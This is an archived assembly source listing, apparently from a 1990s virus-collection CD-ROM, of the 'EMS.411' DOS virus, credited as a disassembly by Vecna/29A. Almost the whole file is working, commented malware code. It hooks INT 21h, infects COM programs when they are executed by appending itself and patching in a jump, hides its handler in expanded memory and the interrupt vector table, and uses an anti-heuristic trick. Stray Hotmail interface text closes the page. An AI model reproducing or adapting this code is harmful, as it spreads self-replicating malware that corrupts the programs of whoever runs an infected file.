home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / CODBRK3.ZIP / Cdbkutl / Source / EMS411.asm next >
Encoding:
Assembly Source File  |  1998-01-23  |  6.9 KB  |  258 lines
  1.  
  2.  
  3. ; EMS.411 Virus
  4. ; Dissassembly by Vecna/29A
  5.  
  6. .model tiny
  7. .code
  8. .386p
  9. org 0
  10.  
  11. VirusStart:
  12.        jmp RealStart                   ; jump to real start of virus
  13.  
  14. HostCode:
  15.        int 20h                         ; code of the start of the host is
  16.        nop                             ; stored here
  17.  
  18. EMM    db 'EMMXXXX0'
  19.  
  20. InfectJump:
  21.        db 0e9h                         ; this jump is written to begin
  22. WhereIAm dw 0                          ; of file
  23.  
  24. LowMemCode:
  25.        pushf
  26.        cmp byte ptr cs:[InUse-LowMemCode], 0
  27.        jnz Int21InUse                  ; if we're using int21, the bit is set
  28.        pusha
  29.        mov ax, 4400h
  30.        xor bx, bx
  31.        mov dx, cs:[Page_-LowMemCode]
  32.        int 67h                         ; map our page
  33.        popa
  34.        popf
  35.        db 09ah                         ; call our int21 handler in the EMS
  36.        dw offset Int21Handler
  37. PageFrame dw 0000h
  38.        pusha
  39.        pushf
  40.        mov ax, 4400h
  41.        mov bx, 0FFFFh
  42.        mov dx, cs:[Page_-LowMemCode]
  43.        int 67h                         ; unmap out page
  44.        mov bp, sp
  45.        mov ax, [bp+0]                  ; get flag status after exec
  46.        mov [bp+16h], ax                ; and put in the caller stack
  47.        popf
  48.        popa
  49.        iret
  50.  
  51. Page_  dw 0                            ; number of our page
  52.  
  53. InUse  db 0                            ; this byte is set if we are using
  54.                                        ; the int21
  55. Int21InUse:
  56.        popf
  57.        db 0EAh                         ; jump to real int21
  58. Old21:
  59.        dd 0
  60.  
  61. Int21Handler:
  62.        pushf
  63.        xchg ax, dx                     ; anti-heuristic
  64.        cmp dx, 4B00h
  65.        jz Infect                       ; infect on execute only
  66.        xchg ax, dx
  67.        call dword ptr cs:[Old21]       ; do real call
  68.        retf
  69.  
  70. Infect:
  71.        popf
  72.        call ToggleFlag                 ; set flag warning we using int 21
  73.        xchg ax, dx
  74.        push ds
  75.        push dx
  76.        pushf
  77.        call dword ptr cs:[Old21]       ; execute original function first
  78.        pushf
  79.        pusha
  80.        push ds
  81.        mov bp, sp
  82.        lds dx, [bp+14h]                ; load DS:DX from the saved copy in
  83.        mov ax, 3D02h                   ; the stack, and open the file R/W
  84.        int 21h
  85.        xchg ax, bx
  86.        mov ah, 3Fh
  87.        mov cx, 3
  88.        push cs
  89.        pop ds
  90.        mov dx, offset HostCode         ; read 3 bytes from file to our buffer
  91.        int 21h
  92.        mov ax, 4202h
  93.        cwd
  94.        xor cx, cx
  95.        int 21h                         ; seek to the end of the file
  96.        sub ax, 3                       ; sub 3 for the jump
  97.        push ax
  98.        sub ax, (offset VEnd-offset VirusStart)
  99.        cmp ax, word ptr ds:[HostCode+1]; a possible jump in start of file
  100.        jz AlreadyInfected              ; point to same place than we used to
  101.        mov ax, 'ZM'                    ; be? If yes, is already infected
  102.        cmp ax, word ptr ds:[HostCode]
  103.        jz AlreadyInfected              ; file start with MZ (EXE file) ??
  104.        pop ax
  105.        mov word ptr ds:[WhereIAm], ax  ; save position for jump
  106.        mov ah, 40h
  107.        mov cx, (offset VEnd-offset VirusStart)
  108.        cwd
  109.        int 21h                         ; write virus code to end of file
  110.        mov ax, 4200h
  111.        xor cx, cx
  112.        cwd
  113.        int 21h                         ; seek to start of file
  114.        mov ah, 40h
  115.        mov cx, 3
  116.        mov dx, offset InfectJump
  117.        int 21h                         ; write a jump to virus code
  118.        jmp short InfectionOk
  119.  
  120. AlreadyInfected:
  121.        add sp, 2                       ; fix the stack
  122.  
  123. InfectionOk:
  124.        mov ah, 3Eh                     ; close file
  125.        int 21h
  126.        call ToggleFlag                 ; we're not using int21 anymore
  127.        pop ds
  128.        popa
  129.        push bp
  130.        mov bp, sp
  131.        lea sp, [bp+8]                  ; get returned AX and FLAGS
  132.        push ax
  133.        mov ax, [bp+2]
  134.        push ax
  135.        popf                            ; put they in right place
  136.        pop ax
  137.        mov bp, [bp+0]
  138.        retf
  139.  
  140. ToggleFlag:
  141.        push ax
  142.        push ds
  143.        mov ax, 24h                     ; set flag of int21 in use
  144.        mov ds, ax
  145.        xor byte ptr ds:[InUse-offset LowMemCode], 1
  146.        pop ds
  147.        pop ax
  148.        retn
  149.  
  150. RealStart:
  151.        pusha
  152.        mov bx, word ptr cs:[101h]      ; 101 hold the offset part of the jump
  153.        add bx, 103h                    ; that we put in the start of host
  154.        call Install
  155.        mov di, si
  156.        lea si, [bx+3]
  157.        movsb                           ; restore old code
  158.        movsw
  159.        popa
  160.        jmp si                          ; jump to start of file
  161.  
  162. Install:
  163.        push bx
  164.        push si
  165.        push es
  166.        push ds
  167.        push bx
  168.        push bx
  169.        push ds
  170.        mov ax, 24h                     ; check if we are already in 24:0
  171.        mov ds, ax
  172.        cmp word ptr ds:[0], 2E9Ch      ; PUSHF/CS:
  173.        pop ds
  174.        jz AlreadyInstalled
  175.  
  176.        lea si, [bx+offset EMM]
  177.        mov ax, 3567h
  178.        int 21h                         ; get segment of EMM386
  179.  
  180.        mov di, 0Ah
  181.        mov cx, 8
  182.        rep cmpsb                       ; is really EMM386?
  183.        jnz AlreadyInstalled
  184.  
  185.        mov ah, 42h
  186.        int 67h                         ; Number of pages
  187.        cmp bx, 1
  188.        jl AlreadyInstalled             ; less than 1, abort install
  189.  
  190.        mov ah, 41h
  191.        int 67h                         ; get page frame
  192.  
  193.        pop si
  194.        mov cs:[si+PageFrame], bx       ; save it
  195.        mov es, bx
  196.  
  197.        mov ah, 43h
  198.        mov bx, 1
  199.        int 67h                         ; allocate 1 page
  200.  
  201.        mov cs:[si+Page_], dx
  202.        mov ax, 4400h
  203.        mov bx, 0
  204.        int 67h                         ; map memory
  205.  
  206.        mov ax, 3521h
  207.        int 21h                         ; get adress of int21
  208.  
  209.        mov word ptr cs:[si+Old21], bx  ; save it
  210.        mov word ptr cs:[si+Old21+2], es
  211.  
  212.        mov es, cs:[si+offset PageFrame]
  213.        xor di, di
  214.        mov cx, 19Bh                    ; copy our code to our page
  215.        rep movsb
  216.  
  217.        mov ax, 4400h
  218.        mov bx, 0FFFFh
  219.        int 67h                         ; unmap memory
  220.  
  221.        mov di, 24h
  222.        mov bx, di
  223.        mov es, di
  224.        xor di, di
  225.        pop si
  226.        add si, 11h
  227.        mov cx, offset Int21Handler-offset LowMemCode
  228.        rep movsb                       ; move int21 handler to IVT
  229.  
  230.        mov ds, bx
  231.        xor dx, dx
  232.        mov ax, 2521h                   ; point int21 to 24:0
  233.        int 21h
  234.  
  235.        jmp InstalledOk
  236.  
  237. AlreadyInstalled:
  238.        add sp, 4                       ; fix stack if error
  239.  
  240. InstalledOk:
  241.        pop ds
  242.        pop es
  243.        pop si
  244.        pop bx
  245.        ret                             ; return
  246.  
  247. VEnd   = $
  248.  
  249. End    VirusStart
  250.  
  251.    [Reply/ReplyAll/Forward]  [Delete]  [Prev/Next Message]
  252.                            [Close]
  253. [-]
  254.  
  255.  [Move To]
  256.  
  257. [⌐ 1996-1997 Hotmail.  All Rights Reserved.]
  258.